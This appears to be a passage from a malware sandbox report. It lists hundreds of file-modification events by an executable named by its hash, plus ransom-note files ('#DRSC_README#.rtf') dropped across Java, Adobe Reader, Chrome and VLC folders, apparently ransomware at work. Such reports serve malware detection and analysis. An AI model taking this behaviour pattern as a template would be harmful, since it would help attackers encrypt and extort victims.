C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\download-btn.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\net.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\GRAY.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\NOTICE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\el_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\scan_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ar.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nothumbnail_34.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfontj2d.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\remove.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification 